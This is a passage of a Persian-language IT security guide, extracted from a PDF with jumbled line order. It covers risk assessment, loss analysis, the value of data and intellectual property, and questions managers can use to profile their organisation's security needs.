‫‪Financial Intelligence Units‬‬
‫‪49‬‬
‫‪50‬‬
‫‪۵۲‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ‪ ARPANET‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ ،‬ﻛـﻪ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۶۹‬ﺑﻮﺳـﻴﻠﺔ‬
‫ﺳـــﺎﺯﻣﺎ ‪‬‬
‫ﻥ ﭘـــﺮﻭﮊﻩﻫـــﺎﻱ ﺗﺤﻘﻴﻘـــﺎﺗﻲ ﭘﻴـــﺸﺮﻓﺘﻪ ) ‪Advanced‬‬
‫‪51‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫•‬
‫ﻃﺮﺍﺣﻲ ﺩﻭﺭﻩﻫﺎﻱ ﻣﺘﻤﺮﻛﺰ ﺑـﺮﺍﻱ ﻣﻤﺘﺤﻨـﺎﻥ ﺑـﺎ ﻛﻤـﻚ‬
‫ﻣﺆﺳــﺴﻪ ﭘﺎﻳــﺪﺍﺭﻱ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ‪ ٥١‬ﻳــﺎ ﺩﻳﮕــﺮ ﻣﺮﺍﻛــﺰ‬
‫ﺁﻣﻮﺯﺷﻲ؛‬
‫‪١٣٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﺍﺭﻭﭘﺎ‪ ،‬ﺁﺳﻴﺎ ﻭ ﺁﻣﺮﻳﻜﺎﻱ ﺟﻨﻮﺑﻲ‬
‫ﻧﻴﺰ ﺗﻮﺟﻪ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺑـﺪﻳﻬﻲ ﺍﺳـﺖ ﻛـﻪ ﻣﻄﺎﻟـﺐ ﺯﻳـﺎﺩﻱ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺗﻲ ﭼـﻮﻥ "ﻣـﺸﻜﻼﺕ ﻭﻳـﮋﺓ ﺑﺎﺯﺍﺭﻫـﺎﻱ‬
‫ﻧﻮﻳﻦ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ"‪ ،‬ﻭ "ﺯﻣﻴﻨﻪﻫﺎﻱ ﺣﻘﻮﻗﻲ ﻭ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﻪﻫـﺎﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ"‬
‫ﻃﺮﺡ ﻛﺮﺩ‪.‬‬
‫ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻓﻌﺎﻟﻴـﻬﺎ‪ ،‬ﻧﻴﺮﻭﻱ ﺑﺎﻟﻘﻮﺓ ﻋﻈﻴﻢ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﻄﺒﻴﻖ ﺩﺍﺩﻩﺍﻧﺪ ﺑﻪ ﺷﺪﺕ ﺑﻪ ﺧﻄـﺮ‬
‫ﻣﻲﺍﻓﺘﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨـﺎﻥ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺑـﺎﺯﺍﺭ ﻫـﺴﺘﻨﺪ‬
‫ﻱ ﺍﻳـﻦ‬
‫ﺑﻄﻮﺭ ﺟﺪﻱ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌـﺪ ﹺ‬
‫ﺑﺨﺶ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺩﻧﺒﺎﻝ ﺷﺪﻩﺍﻧﺪ‪:‬‬
‫ﺍﻟﻒ( ﺭﻭﺷﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ؛‬
‫ﺏ( ﺭﺍﻫﻨﻤﺎﻱ ﻋﻤﻠﻲ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ؛‬
‫ﺝ(‬
‫ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﻭ ﻭﻳﮋﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭﺑﺎﺭﺓ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ ﻭ‬
‫ﺩ(‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ‪ ،‬ﺑﺎ ﺍﻇﻬﺎﺭ ﻧﻈﺮﻫـﺎﻳﻲ ﺍﺯ‬
‫ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺩﺭ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ‪ ،‬ﺑﻮﻳﮋﻩ‬
‫ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﺑﺨــﺶ ﻣــﺎﻟﻲ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﺗﺠــﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪.‬‬
‫‪ (Research Projects Agency‬ﺩﺭ ﻭﺯﺍﺭﺕ ﺩﻓــﺎﻉ ﺍﻳــﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ‪.‬‬
‫‪١٣٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ‪ :‬ﻣﺮﺯﻫﺎﻱ ﺟﺪﻳﺪ‬
‫ﻛﻠﻴﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ ‪ -‬ﭼﻪ ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ ‪ -‬ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴـﺖ ﺩﺭ‬
‫ﻳﻚ ﻣﺤﻴﻂ ﺟﻬﺎﻧﻲ ﻫﺴﺘﻨﺪ‪ .‬ﭘﻴﺸﺮﻓﺖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺣﻤﻞ ﻭ ﻧﻘﻞ ﺩﺭ ﻗـﺮﻥ ﮔﺬﺷـﺘﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺑﺎﺯﺍﺭﻫـﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ‬
‫ﻧﺰﺩﻳﻜﺘﺮ ﻛﺮﺩﻩ‪ ،‬ﻫﺰﻳﻨﻪﻫﺎ ﺭﺍ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻩ ﻭ ﺑﺎﻋـﺚ ﺷـﺪﻩ‬
‫ﺍﻣﺮﻭﺯ ﺑﺘﻮﺍﻥ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﺮﺍﻱ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺑﻪ ﺗﻤﺎﻣﻲ ﻧﻘﺎﻁ ﺩﻧﻴـﺎ‬
‫ﺍﺭﺳﺎﻝ ﻛﺮﺩ‪ .‬ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﻣـﺪﻳﺮﺍﻥ ﺑﺎﻳـﺪ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺮﺍﻱ ﻣﺆﺳﺴﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﻧﻈـﺮ ﺑﮕﻴﺮﻧـﺪ‪ .‬ﺍﺯ ﺍﻧﺘﻬـﺎﻱ‬
‫ﺩﻫﺔ ‪ ۱۹۹۰‬ﺑﻪ ﺑﻌﺪ ﺣﻤـﻼﺕ ﺷـﺪﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ‬
‫ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺖ )ﻧﻈﻴﺮ ﺣﻤﻠﻪ ﺑﻪ ﻣﺮﻛﺰ ﺗﺠﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺳـﺎﻝ ‪.(۲۰۰۱‬‬
‫ﻼ‬
‫ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﺭﺧﺪﺍﺩﻫﺎﻳﻲ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻛـﺎﻣ ﹰ‬
‫ﺭﻭﺷﻦ ﺷﺪ‪ :‬ﺿﺮﻭﺭﺕ ﺣﻀﻮﺭ ﭘﻠﻴﺲ ﺩﺭ ﺍﻃﺮﺍﻑ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ‪ ،‬ﻛﻨﺘﺮﻝ‬
‫ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ‪ ،‬ﻃﺮﺍﺣﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺻـﺤﻴﺢ ﺑـﺮﺍﻱ ﺗﺨﻠﻴـﺔ‬
‫ﻣﺤﻴﻂ ﺩﺭﺻﻮﺭﺕ ﻭﻗـﻮﻉ ﺣﺎﺩﺛـﻪ‪ ،‬ﻭ ﺗﻮﺳـﻌﻪ ﺩﺍﺩﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ‬
‫ﻣﻄﻤﺌﻦﺗﺮ ﺑﺎ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠﻲ ﻭ ﻛﺸﻮﺭﻱ‪.‬‬
‫ﺩﺭ ﻗﺴﻤﺖ ﻓﻨﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻇﺮ ﺑﺮﺭﺳﻲ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ ﻛـﻪ ﺍﺯ‬
‫ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻣﺘﻮﺟﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ‪ ،‬ﻭ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﮔﺮﻭﻫﻬﺎ ﺭﺍ ﺑﻪ ﻫﻢ‬
‫‪Risk Evaluation‬‬
‫‪Loss Analysis‬‬
‫‪53‬‬
‫‪54‬‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ‬
‫ﺍﮔﺮﭼــﻪ ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣــﺸﺘﺮﻛﻲ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺯﻱ‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣــﺎ ﺩﺍﺷــﺘﻦ‬
‫ﺗﺼﻮﻳﺮ ﻛﺎﻣﻠﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭ ﻗﺎﻟﺐ ﻓﻌﺎﻟﻴﺖ ﺁﻥ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﻳـﻚ‬
‫ﻲ ﺧﻮﺏ‪ ،‬ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﻣﺠﻤﻮﻋﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﻃﺮﺡ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺩﻓﻊ ﺿﺎﻳﻌﺎﺕ ﺧﻄﺮﻧـﺎﻙ‬
‫ﻳﺎ ﻣﻮﺍﺩ ﺯﻳﺴﺘﻲ ﻓﻌﺎﻝ ﺍﺳﺖ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﻳﻚ‬
‫ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻟﻮﺍﺯﻡ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻓﺮﺁﻳﻨـﺪ‬
‫ﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘﻲ ﺗﻮﺳﻂ ﻣﺪﻳﺮﻳﺖ‪ ،‬ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ‬
‫ﺷﻨﺎﺳﺎﻳ ﹺ‬
‫ﭘﻨﺞ ﺳﺌﻮﺍﻝ ﺯﻳﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪:‬‬
‫‪.۱‬‬
‫ﺍﺻﻠﻲﺗﺮﻳﻦ ﻣﺤﺼﻮﻝ ﻳﺎ ﺧﺪﻣﺖ ﺳـﺎﺯﻣﺎﻥ ﭼﻴـﺴﺖ؟ ﺍﮔـﺮ‬
‫ﭼﻨﺪ ﭘﺎﺳﺦ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪.۲‬‬
‫ﻣﻨﺎﺑﻊ ﺍﺻﻠﻲ ﺩﺭﺁﻣﺪ ﻭ ﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻛﺪﺍﻣﻨﺪ؟‬
‫‪.۳‬‬
‫ﺳﺎﺧﺘﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﭼﮕﻮﻧـﻪ ﺍﺳـﺖ؟ ﺑﺨـﺸﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻭ‬
‫ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﻫﺮﻳﻚ ﻛﺪﺍﻣﻨﺪ؟ ﺍﻳﻦ ﺑﺨﺸﻬﺎ ﭼﮕﻮﻧﻪ‬
‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨـﺪ؛ ﭼﮕﻮﻧـﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ‬
‫ﻣﻲﻧﻤﺎﻳﻨﺪ؛ ﻭ ﭼﮕﻮﻧﻪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﺠﻤﻮﻋـﺔ ﻭﺍﺣـﺪ ﺑـﻪ‬
‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟‬
‫‪Intellectual Property‬‬
‫‪55‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ‪ ٥٣‬ﻭ ﺗﺤﻠﻴـﻞ ﺯﻳـﺎﻥ‪ ٥٤‬ﻭ ﺁﺳـﻴﺒﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺗﺠﺎﺭﻱ ﺑﺮﺭﺳﻲ ﻣﻲﺷـﻮﻧﺪ؛ ‪ ،‬ﻣﻨـﺸﺄ‪ ،‬ﻋﻤﻠﻜـﺮﺩ‬
‫ﻣﺤﺘﻤﻞ‪ ،‬ﻭ ﺷﺪﺕ ﺍﺛـﺮﺍﺕ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮ‬
‫ﻲ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣﺮﻩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ؛ ﻧﻜـﺎﺕ ﺍﺻـﻠ ﹺ‬
‫ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺻﺤﻴﺢ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺻﻮﻝ ﺍﺳﺎﺳـﻲ‬
‫ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﻣـﻮﺭﺩ‬
‫ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻣﺘﺼﻞ ﻣﻲﻛﻨﻨﺪ ﺍﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻣﺤﻴﻂ ﻛﺎﺭ‪ ،‬ﺩﺍﺩﻩﻫـﺎﻱ ﺧـﺎﻡ‬
‫ﻧﻈﻴﺮ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺭﻗﺒـﺎ ﻭ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﻭ ﺑﻪ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﻴﺎﺯ‬
‫‪٥٥‬‬
‫ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨـﻮﻱ‬
‫ﻱ ﻣﻨﺤﺼﺮ ﺑﻔـﺮﺩ‬
‫ﻧﻈﻴﺮ ﺍﺳﻨﺎﺩ ﺗﺤﻘﻴﻘﺎﺕ ﻋﻠﻤﻲ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻛﺎﺭ ﹺ‬
‫ﻲ ﻭﻳـﮋﻩ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻭ ﻧﻴﺎﺯﻣﻨﺪ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺩﺭ ﺩﻧﻴﺎﻳﻲ ﻛﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺭﻗﺎﺑﺖ ﺩﺭ ﺁﻥ ﺷﺪﺕ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺳـﺮﻗﺖ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﺎﻡ ﻭ ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻓﻜﺮﻱ ﺍﺯ ﻃﺮﻳﻖ ﺭﺍﻳﺎﻧﻪ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ‬
‫ﺍﺳﺖ‪ .‬ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ "ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ" ﻛﻪ ﺩﺭ ﻧﮕﺮﺵ ﻛﻠـﻲ‬
‫ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺁﻣـﻮﺯﺵ ﻭ‬
‫ﻫﻮﺷﻴﺎﺭﺳﺎﺯﻱ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻔﺎﻑ ﺩﺭﻭﻥ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﺑـﻪ‬
‫ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺍﻣﻨﻴـﺖ‬
‫ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫‪١٣٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪.۴‬‬
‫ﻛﺪﺍﻡ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻫﺮ ﺑﺨﺶ ﺣﺴﺎﺳﺘﺮ ﺍﺳﺖ ﻭ ﺍﺯ ﭼـﻪ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻭ ﺗﻮﺯﻳﻊ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺧﺎﺭﺝ‬
‫ﻭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟‬
‫‪.۵‬‬
‫ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﺷـﺮﻛﺎ ﻭ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺳـﺎﺯﻣﺎﻥ ﭼـﻪ ﻛـﺴﺎﻧﻲ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻧﺤﻮﺓ ﺗﻌﺎﻣﻞ ﺁﻧﻬﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻥ ﭼﮕﻮﻧﻪ ﺍﺳﺖ؟‬
‫ﺍﻃﻼﻋﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ ﭘﺎﺳـﺦ ﺩﺍﺩﻥ ﺑـﻪ ﺍﻳـﻦ ﺳـﺆﺍﻻﺕ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﮔﻔﺘﮕﻮ ﺑﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ )ﺑﺨﺼﻮﺹ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ(‪ ،‬ﻣﺪﻳﺮﺍﻥ ﻭ ﻫﻴﺄﺕ ﻣﺪﻳﺮﻩ ﺷﺮﻛﺖ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻧﻈﺮﺍﺕ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﻣﺴﺎﺋﻞ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻛﺸﻒ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳـﺪ ﺷـﻮﺩ‪ .‬ﺩﺳـﺖ ﺁﺧـﺮ‬
‫ﺍﻳﻨﻜﻪ ﺗﻴﻤﻲ ﻛﻪ ﺑﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﭘـﺮﺩﺍﺯﺩ ﺑﺎﻳـﺪ ﺑـﺎ‬
‫ﺍﺩﺑﻴﺎﺕ ﮔﺰﺍﺭﺷﺎﺕ ﺭﺳﺎﻧﻪﻫﺎ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺁﺷﻨﺎ ﺑﺎﺷـﺪ‪ .‬ﻧﻈـﺮﺍﺕ‬
‫ﻋﻤﻮﻣﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ؛ ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺷـﺮﻛﺖ ﺩﺭ‬
‫ﺻﻨﻌﺘﻲ ﺑﺤﺚﺍﻧﮕﻴﺰ ﻳﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻫﻲ ﺣﺴﺎﺱ ﻓﻌﺎﻟﻴﺖ ﻛﻨـﺪ‪ ،‬ﻭ ﻳـﺎ‬
‫ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺩﺭ ﻧﺸﺮﻳﺎﺕ ﻇـﺎﻫﺮ ﺷـﺪﻩ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺷﻤﻦ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ‪:‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ‬
‫ﺯﻣﺎﻧﻴﻜــﻪ ﺷــﺮﻛﺖ ﺳــﺎﺧﺘﺎﺭ ﻭ ﻋﻤﻠﻜــﺮﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺭﺯﻳــﺎﺑﻲ ﻛــﺮﺩ‪،‬‬
‫ﻣﻮﻗﻌﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺷﺮﺣﻲ ﺍﺯ ﻧﻘـﺎﻁ ﺑـﺎﻟﻘﻮﺓ ﻗـﻮﺕ ﻭ‬
‫ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺁﻥ ﺑﺪﺳـﺖ ﻣـﻲﺁﻳـﺪ‪ .‬ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺭﻭﻱ‬
